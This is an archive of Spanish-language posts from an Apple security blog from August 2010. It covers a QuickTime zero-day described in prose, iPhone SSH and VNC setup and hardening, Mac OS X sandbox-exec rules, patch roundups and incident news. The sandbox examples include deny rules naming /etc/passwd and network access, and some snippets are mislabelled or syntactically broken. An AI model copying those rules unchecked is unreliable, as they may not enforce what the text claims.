Menú principal

martes, 31 de agosto de 2010

Peligroso 0-day exploit para Apple Quicktime Player en Windows

Ayer, Rubén Santarmarta, investigador español de seguridad, sacó a la luz pública una vulnerabilidad que permite ejecutar código arbitrario en todas las versiones de Windows a partir de una vulnerabilidad en Apple Quicktime Player que lleva 9 años escondida y que ha dado la vuelta al mundo.

La vulnerabilidad se debe a un parámetro olvidado, llamado "_Marshaled_pUnk", en el visor de QuickTime que se utilizaba para cargar elementos dentro de la ventana. Esta funcionalidad se eliminó, pero como dice el propio Rubén Santamarta en la publicación de su exploit, parece que alguien se olvido de limpiarlo.

Para explotar la vulnerabilidad, Rubén utilizó una técnica llamada ROP (Return Oriented Programing) por la que, mediante la carga de la librería WindowsLiveLogin.dll, presente en todos los equipos en los que está instalado Windows Live Messenger, pudo reorganizar el código para generar un exploit funcional en Internet Explorer 8 y Windows 7.

Como mitigar el impacto

Actualmente no hay parche oficial, y es posible que el número de exploits que utilicen este vector de ataque se dispare, por lo que se recomienda controlar el uso del visor de QuickTime en Internet. Para ello, se puede utilizar la funcionalidad que ofrece Internet Explorer para elegir qué usuarios y qué dominios pueden cargar un determinado componente en Internet Explorer 8.

En el blog Windows Técnico hay un interesante artículo que explica como configurar los componentes de Internet Explorer 8 de esta forma.

Además, desde que Internet Explorer 8 está integrado completamente en las políticas de Active Directory, se recomienda gestionar la carga de componentes en el navegador de forma centralizada mediante una política corporativa.

lunes, 30 de agosto de 2010

Cuidado con las betas

Los más freaks solemos probar cualquier cosas nueva que cae en nuestras manos y eso es bueno. Tener curiosidad y ganas de descubrir cosas es lo que acaba por marcar la diferencia entre los que tienen pasión o no por este mundo. Sin embargo, hay que tener en cuenta que a veces puede resultar un riesgo para la seguridad.

Apple ha sacado la Beta 3 de Mac OS X 10.6.5 sólo para desarrolladores, sin embargo, como era de esperar,esta versión ya ha aparecido en muchas de las webs de descargas. Así, muchos ya están como locos probando la nueva beta. Hasta ahí bien.

Sin embargo, si la estás probando, debes tener en cuenta que la versión no está en la fase de su ciclo de vida de soporte, por lo que deberás tener especial cuidado con ella con respecto a las vulnerabilidades conocidas y a los datos que almacenes en el sistema. Aunque es una beta 3, muy avanzada, y muy cercana a lo que será la versión final de lo que saldrá antes de fin de año, no pierdas de vista que es una beta.

Configuración OpenSSH en dispositivos iPhone (1 de 4)

========================================================================
- Configuración OpenSSH en dispositivos iPhone (1 de 4)
- Configuración OpenSSH en dispositivos iPhone (2 de 4)
- Configuración OpenSSH en dispositivos iPhone (3 de 4)
- Configuración OpenSSH en dispositivos iPhone (4 de 4)
========================================================================

Hoy comenzamos con esta serie dedicada a como utilizar el protocolo SSH [Secure Shell] como medio de conexión seguro al dispositivo iPhone. En ella se van a tratar diversos temas, tales como la conexión por defecto al servidor SSH tras la realización del Jailbreak al dispositivo, la seguridad de las claves de conexión, las opciones más importantes de configuración en el servidor SSH del iPhone, así como recomendaciones de seguridad sobre el uso de este protocolo y la generación de pares de clave.

SSH es un protocolo creado desde el punto de vista de seguridad, pero descuidos a la hora de su configuración o implementación, como fue el caso del famoso Bug de OpenSSL en Debian, puede llevarnos a un estado de inseguridad. Se puede decir también que, en función de dónde se ejecute una conexión SSH, pueden existir más o menos riesgos.

Por supuesto, todo lo que aquí se trate es válido para el resto de dispositivos móviles de Apple. Aunque el artículo se centra en iPhone todo lo explicado puede ser utilizado tanto en dispositivos iPod touch como iPad.

Instalación del servidor OpenSSH desde Cydia

Con un iPhone con el Jailbreak realizado se pueden realizar muchas tareas que de otro modo no se pueden ejecutar. SSH capacita al terminal de Apple para permitir el acceso a dispositivos iPhone con permisos de administración. En este caso se desea ejecutar dicho acceso mediante clientes SSH.

Para la instalación del servidor SSH en el dispositivo se debe utilizar la aplicación de repositorios Cydia. Una vez arrancada, se buscará el paquete OpenSSH, como se aprecia en la imagen inferior izquierda. Este paquete es el que instalará el servidor SSH en el dispositivo.

Para ver en que repositorio se encuentra el paquete buscado, se debe pulsar el botón de instalar. En este caso, en la imagen inferior derecha, en lugar del botón instalar, aparece el botón modificar porque en el dispositivo iPhone en el que se han hecho las capturas ya se encontraba instalada la herramienta.


Configuración por defecto de OpenSSH

El servidor OpenSSH estará funcionando, por defecto, en el puerto 22 del dispositivo IPhone, además, atenderá las conexiones por la dirección IP que tenga configurado, ya sea esta una dirección IP estático o dinámica entregada por el servidor DHCP de la red que se esté utilizando. Todos los usuarios del sistema, es decir, el usuario root y el usuario mobile, tendrán privilegios para conectarse al servidor SSH. Es por tanto muy importante que las contraseñas de estos usuarios estén fortificadas.

Primera conexión

Para realizar la primera conexión, y comprobar que todo funciona correctamente, se necesitará un cliente que soporte el protocolo SSH. Para la realización del presente post se ha utilizado el cliente putty para Windows. Si quisiéramos un cliente para Mac se podría utilizar directamente desde un terminal de MacOS X el comando ssh, o bien Filezilla que es un cliente gráfico.

El primer paso a realizar es tener el iPhone y el equipo, ya sea  Windows o Mac OS X, en la misma red. Por lo que no valdría que el iPhone estuviera conectado a la red 3G. Esto es debido a que las compañías telefónicas usan un rango de direcciones IP privado, del estilo 10.x.x.x\8. Hay que tener presente que, en una primera conexión, hasta que el servidor SSH no esté fortificado, es necesario realizar esta prueba en una red de confianza o fortificada.

Una vez se tiene el iPhone conectado mediante Wifi, a la misma red que el equipo y OpenSSH instalado, ya se podrá pedir la solicitud de conexión al dispositivo.

Se configura para ello putty con la dirección IP del dispositivo iPhone al que se quiere conectar y el puerto, que en la primera conexión será el 22. Introducimos credenciales de acceso, y si éstas son correctas estaremos conectados al dispositivo móvil.

Una vez conectados se podrá visualizar todo el sistema de ficheros del iPhone y realizar las gestiones u operaciones que se antojen.


Conexión al dispositivo iPhone como usuario root

Ejecución de comandos en el dispositivo iPhone

========================================================================
- Configuración OpenSSH en dispositivos iPhone (3 de 4)
========================================================================

domingo, 29 de agosto de 2010

Fue noticia en Seguridad Apple: Semana del 16 al 29 de Agosto

Como cada 2 domingos, repasamos todas las noticias publicadas, para que no se quede nada en el tintero, que han pasado muchas cosas durante estas dos semanas en el mundo de la seguridad Apple.

Lunes 16 de Agosto:

Os traíamos lo que se puede hacer con el Jailbreak en iOS 4.0.2. Se comentaban aplicaciones muy útiles para liberar dispositivos móviles, para realizar el jailbreak, parchear la vulnerabilidad PDF y aun así mantener una versión anterior que permitiera realizar el JailbreakMe o el Unlock.

Martes 17 de Agosto:

No os dejéis estafar por las campañas en Facebook o Twitter, nadie da duros a pesetas. Además, ese mismo día se liberó un exploit, el cual aprovechaba una vulnerabilidad crítica en ColdFusion de la que Adobe liberó un parche de urgencia. Más información de la noticia aquí.

Miércoles 18 de Agosto:

Es muy importante siempre tener un ojo en la seguridad de nuestro equipo, y una forma visual y rápida de vigilar lo que ocurre en las entrañas de nuestro equipos es GeekTool. Esta herramienta permite visualizar los distintos logs del sistema y ver que ocurre a nuestras espaldas desde el fondo del escritorio. Además, ese día vimos como actualizar mirando la firma de Apple las actualizaciones de seguridad de QuickTime e iTunes para Windows.

Jueves 19 de Agosto:

SQL injection afecta a Apple.com. Dos de las webs de Apple fueron víctimas de  ataque masivo de SQL Injection sobre aplicaciones Web que funcionaban con SQL Server. Esto hizo que la web de Apple sirviera , durante un corto periodo de tiempo, para distribuir malware.

Viernes 20 de Agosto:

La encriptación en Mac OS. Este viernes publicamos como trabajar con contenedores de ficheros seguros, la herramienta elegida fue TrueCrypt para gestionar la criptografía. Además, ese día salto a las noticias cuales son las intenciones de Apple para el futuro. Es muy posible que Apple este buscando la forma de “perseguir” a las personas que hackean sus dispositivos móviles. Y también es muy posible que Apple quiera que los fieles al dispositivo de fábrica obtengan beneficios respecto a los "infieles" que utilizan procedimientos como el Jailbreak para zafarse del mundo cerrado de Apple.

Sábado 21 de Agosto:

Adobe parchea las demos que Charlie Miller presentó en BlackHat. Adobe está en el punto de mira y últimamente se descubren muchas vulnerabilidades sobre ella. Este día lo dedicamos a anunciar la disponibilidad de un parche de Adobe que atajaba todas las demos que el famoso investigador de seguridad hizo en la Black Hat USA 2010 con su herramienta BitBlaze.

Domingo 22 de Agosto:

Un poco de historia para los seguidores de Apple. Este día se publicó una noticia extraída de Cyberhades sobre el primer mal rollo entre Steve Jobs y Steve Wozniack. Los comienzos siempre son duros…

Lunes 23 de Agosto:

Los foros de Apple fueron hackeados la semana anterior por un defacer, en este enlace os dejamos la noticia sobre el tema y algunos links a otras veces que ya pasó algo similar. Además, volvemos al tema de la encriptación de discos. En como cifrar tus datos en Mac OS X os enseñamos a proteger vuestros datos más confidenciales o escandalosos.

Martes 24 de Agosto:

El señor David HasselHof apareció en nuestros Mac OS. Es un ataque "made" In Informática 64, de nuestro antiguo compañero Pedro Laguna, que fue el impulsor de estos feroces ataques.

Miércoles 25 de Agosto:

El comienzo de una serie de 2 artículos muy interesante sobre Sandboxing en Mac OS X. Éste es el primer artículo de la serie. SandBox es una herramienta muy interesante en temas de seguridad. Además os trajimos el paquete de actualizaciones del día 24 de Agosto que Apple liberó y  os explicamos cuales eran las vulnerabilidades y como se solucionaban. También ese día, repasamos una estafa activa sobre un fraude para los amantes de las compras en iTunes. Comprad con cuidado… y no os fiéis de los correos electrónicos pidiendo datos. Y para terminar, Adobe parchea nada más y nada menos que 20 vulnerabilidades en Adobe ShockWave Player. Parece ser la semana de las actualizaciones de seguridad.

Jueves 26 de Agosto:

Concluimos con la serie sobre sandboxing en Mac, con la segunda parte de Sandboxing en Mac OS X. Como no, ese día nos hicimos eco de la anunciada apertura de las tiendas físicas de Apple en España. Todo sobre uno de los acontecimientos más esperados del año.

Viernes 27 de Agosto:

Si tienes un MacBook Pro de 2010 debes actualizar el firmware rápidamente... Siempre hay que tener actualizado el firmware, así que accede a la lista de actualizaciones y busca el firmware más moderno para tu dispositivo Apple.

Sábado 28 de Agosto:

Para terminar estas dos semanas, una recomendación de una herramienta para gestionar tu iPhone desde tu Mac OS X por VNC: Veency.

Y esto ha sido todo, nos vemos en 15 días en la misma sección.

sábado, 28 de agosto de 2010

Visualización y manejo de iPhone desde Mac OS X por medio de VNC

El presente post va a explicar como configurar el iPhone para ser manejado desde Mac OX X. Este artículo puede ser extendido también para conseguir manejar cualquier dispositivo iPhone desde un PC con sistema operativo Windows.

¿Qué se necesita para hacerlo? Primero, se necesita tener un iPhone con la aplicación Veency instalada, que no podrá hacerse si no el dispositivo no tiene realizaco el Jailbreak.

Veency hace funciones de servidor para el protocolo VNC, convirtiendo el dispositivo iPhone en un servidor de escritorio remoto. Por otro lado, únicamente se necesita un cliente VNC, para poder conectarnos al dispositivo móvil.

El último requisito es tener una red de conexión, que puede ser una línea Wifi o una conexión directa al dispositivo, a la que tanto el dispositivo iPhone como el sistema con Mac OS X estén conectados.

Una vez se tengan todos los requisitos, las 2 aplicaciones instaladas y ambos dispositivos conectados a la misma red, se debe ejecutar la aplicación VNC cliente en Mac OS X. Hay muchos clientes de VNC para Mac, se puede elegir el que se prefiera. Para este ejemplo se ha utilizado el famoso cliente Open Source Chicken of the VNC

Se debe iniciar el cliente VNC e insertar la dirección IP del dispositivo móvil, el puerto se debe dejar por defecto el del protocolo VNC, ya que el servidor VNC instalado en el iPhone estará a la escucha. Una vez la petición de conexión llegue al dispositivo iPhone, aparecerá una pantalla para confirmar la conexión, tal y como se ve en la imagen.

Finalmente, hay que comentar que se podrá realizar cualquier acción desde la pantalla del Mac como si se estuviera delante del iPhone. Esto permite alguna ventaja como poder escribir con el teclado del sistema Mac OS X directamente en el iPhone o majerarse por iPhone usando el ratón, el cual aparecerá dentro del iPhone. Es un detalle bastante sorprendente.

Como nota negativa, se puede añadir que la velocidad de refresco no es elevada, por lo que se puede ver en algún momento que la imagen que vemos del iPhone en el Mac OS X refresca lentamente.


Esperamos que probéis el manejo remoto de vuestro iPhone.

Fortificando Veency

Por supuesto, hay que tener en cuenta que el instalar un servidor VNC al dispositivo iPhone y dejar las opciones por defecto puede ser un autentico problema. Cualquier atacante podría realizar un escaneo de puertos por la red y e intentar conectarse. Para securizar un poco el servidor os damos algunas pequeñas recomendaciones:

1.- Cambia el puerto por defecto en Veency. Así se evitan los escaneos dirigidos por atacantes que buscan servidores VeenCy en la red.

2.- Establece una contraseña segura a tu dispostivo. Evita las passwords, cortas, de palabras de diccionario o por defecto.

3.- Evita redes públicas o inseguras.

4.- No aceptes conexiones de IPs que no conoces.

Utilizar el dispositivo iPhone a través de escritorio remoto puede ser muy útil cuando pasamos largas horas delante de un equipo de escritorio y queremos realizar largas operaciones con el dispositivo móvil o tenerlo trabajando en paralelo y controlado desde el ordenador personal.

viernes, 27 de agosto de 2010

Si tienes un MacBook Pro del 2010 actualiza su firmware

Dentro de las políticas de seguridad de una organización, desde hace mucho tiempo, está el tener cuidado del firmware de puestos de trabajo y servidores. El firmware de los equipos ha sido y es objetivo en ataques locales, y hace ya mucho tiempo que se convirtió en un objetivo más para los desarrolladores de malware.

En este caso, sin embargo, la actualización que Apple pone a disposición de los usuarios de MacBook Pro de equipos de 15 y 17 pulgadas del 2010 es para evitar dos problemas conocidos mediante MacBook Pro EFI Firmware Update 1.9:

- El primero de ellos es para evitar un fallo que generaba un raro error que hacía que durante el proceso de arranque el equipo se pare [TS3423].

- El segundo problema se producía con las salidas de vídeo externas. Si el equipo entraba en suspensión, después de despertar dejaba de emitir el vídeo hacia fuera: [TS3313]

La actaulización de firmware está disponible en la página de soporte de Apple para Intel, en ella, no sólo aparece el firmare de los recientes MacBook Pro, sino de todos los equipos Apple que deben aplicar una actualización de firmare ya que la que tienen de fábrica ha sido modificada.

Para comprobar el modelo exacto y la versión de tu firmware, basta con que desde el Menú Apple selecciones la opción de Acerca de este Mac. Ahí, hay que entrar en Más información y dentro de Contenidos, en la opción de la lista desplegada Hardware se podrá acceder al modelo de tu equipo y la versión del firmware. Así que, ya sabes, actualiza todo tu software, actualiza tu firmware.

jueves, 26 de agosto de 2010

Apertura de tiendas Apple físicas en España

Los seguidores de Apple han estado esperando durante mucho tiempo que en España se abriesen tiendas físicas oficiales de Apple. Anteriormente, para comprar productos de Apple, el usuario se tenía que dirigir a la web de Apple o a vendedores oficiales de Apple, como podían ser cualquier centro comercial o tienda informática especializada. La noticia de que en Septiembre Apple abrirá 2 tiendas físicas en España es recibida por todos los usuarios con cierta alegría.

No es sólo una tienda, es un sitio de reunión para los fanáticos de este mundo, las tiendas de Apple pondrán a disposición del usuario a expertos en el mundo Apple para resolver todo tipo de dudas. Además hay personas que harán demostraciones en la tienda en directo.

La apertura de las tiendas es la siguiente:

- Barcelona. Sábado 4 de Septiembre 10:00 - 22.00. Centro comercial La maquinista.

- Madrid. Sábado 11 de Septiembre 10:00 - 22.00. Centro comercial Xanadú.

Desde SeguridadApple estaremos atentos a posibles noticias sobre estas aperturas, y os incitamos a que visitéis las tiendas siempre que podáis.

Sandboxing en Mac OS X (II de II)

========================================================================
- Sandboxing en Mac OS X (I de II)
- Sandboxing en Mac OS X (II de II)
========================================================================

Continuando con la primera entrada del articulo 'Sandboxing en Mac OS X', lo retomaremos con una serie de reglas que nos ayudarán a crear y configurar sandboxs seguras:

network-inbound / network-outbound

Esta regla se aplica al tráfico de red entrante (network-inbound) o saliente (network-outbound). Si se utiliza el comodín ‘*’ en el nombre de la regla (network*), las restricciones se aplicarán tanto al trafico entrante como saliente. El siguiente fichero de reglas nos permite realizar conexiones salientes, pero nos prohíbe las entrantes.

(version 1)
(allow default)
(deny network-inbound)


Este otro script, nos permitirá realizar conexiones salientes, pero no recibir entrantes.

(version 1)
(allow default)
(deny network-outbound)
(allow network-inbound)


file-read-data

Esta regla hace referencia a la lectura del contenido de los ficheros. Si queremos evitar que un proceso pueda tener acceso de lectura al fichero ‘/etc/passwd’, podremos prohibirlo con la siguiente regla.

(version 1)
(allow default)
(deny file-read-data
(regex “/etc/passwd$”))


file-read-metadata

Con esta regla podemos indicar si podemos leer los metadatos de un archivo, o dicho de otro modo, los permisos del archivo.

(version 1)
(allow default)
(deny file-read-metadata
(regex “/etc/passwd$”))


file-write-data

Esta regla evita que se pueda escribir en un archivo ya existente, pero no evita que se pueda crear el archivo con información, si este no existía previamente, o que este pueda ser borrado. Si se desea proteger un fichero, es aconsejable utilizar ‘file-write*’ en su defecto.

(version 1)
(allow default)
(deny file-write-data
(regex “/tmp/i64$”))


file-write*

Esta es la regla aconsejada para la protección de archivos, en vez de ‘file-write-data’. Esta regla protege de la creación, modificación y borrado.

(version 1)
(allow default)
(deny file-write*
(regex “/tmp/i64$”))


process-exec

Evita la ejecución de los procesos indicados. En el siguiente script bloquearemos todos los comandos excepto ‘/bin/echo’ y ‘/bin/bash’.

(version 1)
(allow default)
(deny process-exec)
(allow process-exec)
(regex “/bin/bash$”)
(regex “/bin/echo$”))


Debido a la poca documentación existente sobre la sintaxis de las reglas de sandbox-exec, os invitamos a que publiquéis aquí reglas que os resulten útiles, y se puedan incluir en el artículo.

========================================================================
- Sandboxing en Mac OS X (I de II)
- Sandboxing en Mac OS X (II de II)
========================================================================

miércoles, 25 de agosto de 2010

Adobe ShockWave parchea... ¡20 vulnerabilidades!

Sí, justo al mismo tiempo que tenemos las actualizaciones de Apple disponibles, hay que volver a actualizar otro software, en este caso el visor de Adobe Shockwave que ha actualizado a la versión 11.5.8.612 corrigiendo 20 vulnerabilidades que han sido reportadas por investigadores de TippingPoint ZDI (Zero Day Initiative), Fortinet's FortiGuard Labs, Check Point, iDefense y Team Montreal Hotties, entre otros. Y es que son tantas, que hasta 20 expedientes han sido generados, con sus correspondientes agradecimientos. Eso sí, todas las vulnerabilidades han sido parcheadas antes de que se hicieran públicas.

Ahora, hay que instalar lo más pronto posible, la actualización disponible para MAC OS X de Adobe Shockwave Player, pues es de esperar que aparezcan exploits para explotarlas.


Adobe ha generado un Boletín de seguridad y ha publicado parches para 32 bits - en versión incremental y actualización completa - y para 64 bits - sólo en versión completa.

Un fraude en el que juegan PayPal e iTunes

Los compañeros de Applesfera se hacen eco de una noticia bastante sorprendente. Al parecer los usuarios de iTunes se han despertado con las cuentas de iTunes crackeadas. Han llegado a tener cargos por valor de 4700 dólares.

Los atacantes han aprovechado este hecho para realizar compras de juegos, aplicaciones, música, vídeos. Por lo que no se puede decir que haya sido una vulnerabilidad en concreta de algún elemento en concreto. Se sospechaba que quizá el acceso a esas cuentas se hubiera obtenido mediante correos electrónicos falsos, después Applesfera ha actualizado su noticia indicando que en efecto el ataque a clientes de iTunes fue realizado mediante correos electrónicos falsos.

¿Fantasía o realidad? No es muy común que ninguna entidad nos pida datos confidenciales por correo electrónico, por lo que os aconsejamos desde SeguridadApple sentido común a la hora de enviar datos confidenciales.

Finalmente desde SeguridadApple os aconsejamos también el uso de herramientas como 1Password, harán vuestra vida un poco más cómoda y segura.

Actualizaciones de seguridad

El 24 de Agosto Apple liberó la actualización de seguridad 2010-005, la cual puede ser descargada a través de Actualización de Software en la barra de menú del Mac.

Los productos afectados por esta actualización son las versiones 10.5.8 de Leopard, 10.5 Leopard Server, 10.6 de SnowLeopard Server, 10.6.4 de SnowLeopard.

ATS. El impacto de esta vulnerabilidad es la siguiente, la visualización o descarga de un documento que contenga una fuente maliciosa incrustada puede provocar la ejecución de código arbitrario. Este problema se ha abordado mediante la comprobación de límites.

CFNetwork. Esta actualización sólo está disponible para SnowLeopard. El impacto de esta vulnerabilidad consiste en que un atacante bien posicionado en una red puede interceptar los credenciales de usuario u otra información confidencial. CFNetwork permite TLS anónimo / conexiones SSL. Este hecho podría permitir a un atacante "Man-in-the-middle" redirigir las conexiones y credenciales o interceptar información sensible. Este problema se aborda mediante la desactivación de TLS anónimos.

ClamAV. Esta actualización sólo está disponible con los sistemas operativos servidor de Apple, tanto Leopard como SnowLeopard. Existen varias vulnerabilidades en ClamAV, pero la más grave permite la ejecución de código arbitrario. Para solucionar este problema se debe actualizar a la versión 0.96.1 de ClamAV. Más información en http://www.clamav.net.

CoreGraphics.La apertura de un archivo PDF malicioso puede provocar la terminación inesperada de la aplicación o lo que es peor la ejecución de código arbitrario. Este problema es solucionado tanto en las versiones de Leopard, SnowLeopard y servidores.

LibSecurity. Un atacante en una red puede obtener un nombre de dominio que sólo difiere en los últimos caracteres del nombre de dominio legítimo. Esto es debido a que existe un problema en el manejo de nombres de host certificado. Para los nombres de host que contienen tres o más componentes, los últimos caracteres no están bien. Por ejemplo, si un atacante obtiene un certificado para www.example.con el atacante puede hacerse pasar por www.example.com.

PHP. La carga de una imagen PNG malintencionada puede conducir la terminación inesperada de la aplicación o la ejecución de código arbitrario. Este problema es resuelto mediante la actualización de libpng en PHP a la versión 1.4.3.

PHP. Múltiples vulnerabilidades en PHP 5.3.1. Se actualiza a la versión 5.3.2 para resolver múltiples vulnerabilidades, la más grave la que permite ejecutar código arbitrario. Más información en http://www.php.net.

Samba. Un atacante remoto no autenticado podría provocar una denegación de servicio o la ejecución de código arbitrario.

Esperemos que os sirvan las explicaciones para actualizar hoy mismo vuestros sistemas Mac. Desde SeguridadApple seguimos siempre atentos todas las posibles vulnerabilidades y actualizaciones de seguridad.

Sandboxing en Mac OS X (I de II)

========================================================================
- Sandboxing en Mac OS X (I de II)
- Sandboxing en Mac OS X (II de II)
========================================================================

El concepto informático de ‘Sandboxing’ es el de separar o restringir las operaciones que un proceso pueda realizar del resto del sistema, de tal modo que éste pueda ejecutarse con determinadas restricciones sin miedo a que pueda dañar nuestro equipo.

En Mac OS X, desde la versión Leopard, existe un comando llamado ‘sandbox-exec’ que permite la ejecución de comandos en una sandbox, el cual se puede configurar a través de ciertas reglas.

No existe demasiada documentación sobre estas reglas, por lo que este pequeño artículo tiene como intención añadir un poco de luz a las reglas más útiles para llevar a cabo ejecuciones en sandboxes seguras.

La sintaxis para la creación de sandboxes, con las reglas cargadas desde un fichero de texto es la siguiente: ‘sandbox-exec -f FicheroDeReglas Aplicación’, como se puede ver en la siguiente imagen donde se ejecuta una shell.


La estructura del fichero de reglas siempre debe comenzar con la línea ‘(version 1)’ seguido de las reglas que se quieran aplicar.

Dos de las reglas más básicas son ‘(allow default) / (deny default)’ y ‘(debug deny) / (debug all)’.

(allow default) / (deny default)

La regla ‘(allow default)’ indica que, por defecto se permite realizar cualquier acción, tal y como si el proceso no se corriera en una sandbox, a excepción de las reglas que se indiquen posteriormente.

En el caso contrario, la regla ‘(deny default)’ actuará denegando todas las acciones excepto las que se indique más adelante.

Como se puede ver, configuran el comportamiento por defecto para todo lo no definido dentro del fichero.

(debug deny) / (debug all)

Esta regla indica si se desea guardar o no un fichero de log con información sobre las acciones que se ejecutan en la sandbox. En caso de que si se desee, se puede especificar si guardar todas las acciones realizadas o únicamente las que estén prohibidas. Si no se quiere registrar información sobre una regla en concreto se puede utilizar ‘(with no-log)’ en ella para evitarlo.

El fichero de log se guarda, por defecto, en la ruta‘/var/log/system.log’. La siguiente captura muestra el fichero de log generado al ejecutar un comando prohibido por este fichero de reglas. Como se puede ver, el fichero de las reglas prohíbe de forma explíctia el uso de la red:

(version 1)
(allow default)
(debug deny)
(deny network*)


Ya que en el anterior fichero de reglas se ha hecho uso de la regla ‘network*’, en la segunda parte de este artículo se explicará en más detalle, junto con otras.

========================================================================
- Sandboxing en Mac OS X (I de II)
- Sandboxing en Mac OS X (II de II)
========================================================================

martes, 24 de agosto de 2010

Ataque David Hasselhof a una Apple Store

No, esta vez no es un hackeo de la web de Apple.com para distribuir malware ni de un defacement en los foros de discusión. En esta ocasión es un ataque de David Hasselhoff.

Para los que no sepáis en que consiste el "Ataque de David Hasselhof" os haremos una breve recordatorio histórico. Allá por el año 2008, Pedro Laguna instauró en Informática64 un sistema infalible para que nadie dejase las máquinas en su puesto de trabajo sin bloquear. Sí, todos somos amigos en nuestro entorno de trabajo, pero un descuido con la sesión abierta puede costar muy caro.

El método, que probó con nuestro compañero "Silverhack" [El caso del Hacker de la oficina], consistía en "castigar" a los descuidados con el mejor fondo de pantalla de David Hasselhoff.

Por supuesto, en algunos entornos, como es el caso de los ordenadores de prueba, se deben configurar sesiones limitadas o restringidas en privilegios. Así, el asunto del caso de David Hasselhoff fue evolucionando.


Pedro Laguna, que ahora vive en Londres, se pasó por una Apple Store y decidió probar si los equipos estaban bien protegidos y la respuesta la tenéis en la foto que podéis ver.

Como se puede ver, el ataque de David Hassehoff en la tienda Apple deja al descubierto todas las cosas divertidas que se podrían hacer desde uno de esos equipos así que:

1) No pongas ninguna password desde ningún ordenador de una tienda Apple.
2) No chatees con nadie sobre "cosas divertidas" desde un ordenador de una tienda Apple.
3) Si puedes, transmite esta lección a todo el mundo.

lunes, 23 de agosto de 2010

Discos cifrados en Mac OS X Snow Leopard / Leopard

En la siguiente entrada se hablará del cifrado de datos en sistemas operativos Mac OS X Leopard y Snow Leopard. El cifrado de los datos puede ser muy interesante si se necesita guardar “bajo llave” los documentos de mayor confidencialidad. El ejemplo que se muestra a continuación se ha realizado con un sistema Snow Leopard, pero se confirma que es totalmente compatible con Leopard. No se necesita ningún software de terceros, el sistema operativo dispone de lo necesario para realizar la operativa.

El primer paso que se debe realizar es arrancar la aplicación Utilidad de Discos, que se puede encontrar en Aplicaciones -> Utilidades -> Utilidad de discos. Una vez abierta la aplicación se puede observar un icono denominado “Nueva imagen”.

Figura 1: Utilidad de Discos en Mac OS X Snow Leopard

A continuación se mostrará un cuadro de diálogo en el cual se debe dar un nombre a la imagen y se da la opción de configurar un método de cifrado. Se ha de configurar un método de cifrado, el que el usuario prefiera (AES de 128 bits ó AES de 256 bits). Se debe especificar el tamaño de la imagen que se quiere utilizar.

Se recomienda al usuario dotar a la imagen del suficiente espacio para albergar la información. Por otro lado, se puede redimensionar la imagen (para aumentar o decrementar el tamaño de la misma) desde esta aplicación en cualquier momento, siempre y cuando haya espacio libre en el disco duro.

Figura 2: Creación de imagen de disco cifrada

Cuando el sistema esté creando la imagen se pedirá la contraseña con la que se cifrará. Se recomienda que la contraseña no se guarde en el llavero del sistema, ya que de este modo no tendría sentido el cifrado porque cualquiera con nuestra sesión abierta podría acceder a esos datos.

Figura 3: Contraseña de cifrado
Una vez se tiene creada la imagen cifrada se puede almacenar los archivos únicamente arrastrándolos dentro de la imagen, por ejemplo desde el Finder o un Terminal. Para montarla el sistema pedirá de autenticación la contraseña que se insertó en el momento de la creación de la imagen.

Cuando se quiera desmontar y volver a cifrar los archivos, bastará con pulsar botón derecho sobre la imagen montada y se debe clickar en expulsar.

Esperamos que este post os haya servido para proteger vuestros datos alejados de los ojos de amigos curiosos.

Foros de Apple hackeados la semana pasada

Si hace poco nos hacíamos eco en Seguridad Apple de el hackeo de Apple.com por medio de un SQL Injection para la distribución de malware, en este caso es para algo más o menos similar. El hackeo de otro servidor de Apple. En esta ocasión no se ha tratado de un ataque masivo, si no de lo que parece un ataque dirigido de una defacer a http://discussions.apple.com.

Los defacements son ataques en los que el objetivo es tomar el control del servidor y cambiar el contenido de las páginas. En portales como Zone-h se suelen reportar los sitios que han sido comprometidos y se les ha realizado un ataque de Defacement para que todo el mundo pueda verlo. En la siguiente lista se observa que sitios web de Apple ya cayeron en estas listas.


En esta ocasión no han aparecido en ninguna lista, pero como se puede ver en la captura tomada por Apple Insider, los servicios ofrecidos para los foros de discusiones fueron tirados abajo, y se podía leer un mensaje curioso, típico de defacers que decía: "For fun, by Tojen".


Llama la atención que sucedan estas cosas a empresas tan grandes como Apple o Microsoft, pero el número de servidores web expuestos es muy grande y es fácil que se quede algo fuera de control. No obstante, eso no es para nada excusa, y más cuando se trata de dar confianza a los clientes. Ya van dos este mes de Agosto para el dominio Apple.com.

domingo, 22 de agosto de 2010

El primer mal rollo entre Steve Wozniak y Steve Jobs

En el blog de Cyberhades publicaron hace poco una historia muy curiosa sobre Apple. Como nos pareció curiosa, y somos amigos, le preguntamos si le importaría que la reprodujéramos aquí. Tras su conformidad (como ya nos temíamos, pasamos a publicarla tal y como fue escrita:

El primer mal rollo entre Steve Wozniak y Steve Jobs

Este libro es una mina, me lo estoy pasando en grande leyendo iWoz. Atento a la historia, seguro que te gustará.

En 1974 Steve Wozniak empezó a trabajar en HP diseñando calculadoras (según palabras de Wozniak, el mejor trabajo que ha tenido) y Steve Jobs empezó a trabajar en Atari. Un día Steve Jobs llamó a Woziak y le comentó que su jefe, nada menos que Nolan Bushnell (fundador de Atari y creador del famoso Pong), quería hacer otro juego parecido al Pong, sólo que esta vez el la pelota iría derribando unos ladrillos y luego, al terminarse los ladrillos, rebotaría en el pared del otro extremo, seguro que te suena.

Por aquella época Wozniak era un crack optimizando circuitos con el menor número posible de chips, por eso lo llamó Nolan, ya que Jobs le habló de él. Así fue como Wozniak diseñó el juego Breakout, en una placa con sólo 45 chips (mira la entrada de la Wikipedia para saber qué pasó al final con el proyecto).

El acuerdo fue que le pagarían en función de los chips utilizados, cuantos menos más dinero, así que al final, Jobs le dijo que le tocaba la mitad de 700€ (ese fue el acuerdo inicial, la mitad entre los dos, Jobs también le echó una mano en la fabricación).

El problema fue que un tiempo después, Woz se enteró que realmente le pagaron a Jobs más de 1.000 dólares de la época por el trabajo (según la Wiki, 5.000$). Eso le dolió (con estas palabras lo indica en su autobiografía), no por el dinero, sino por el hecho del engaño en sí. Él comenta que se lo pasó en grande haciendo el diseño y que por aquella Steve Jobs era su mejor amigo, por eso no le dió importancia.

Aún no habían ni siquiera pensado en la posibilidad de fundar Apple, pero el diseño de esa placa y el manejo de esos chips que para la época eran muy difíciles de conseguir, fue el detonante de que empezara a rondarle por la cabeza el diseño del Apple I …

Fuente, libro iWoz.

Aclaración: ojo, admiro a Jobs, él no fue quien diseñó el Apple, pero su gran visión de negocio y apoyo incondicional a Wozniak lo convierten en un hacker de aquella generación al que le debemos mucho. Pero Woz, es mucho Woz.

Autor: Cybercaronte

sábado, 21 de agosto de 2010

Adobe parchea "las demos" de Charlie Miller en BlackHat

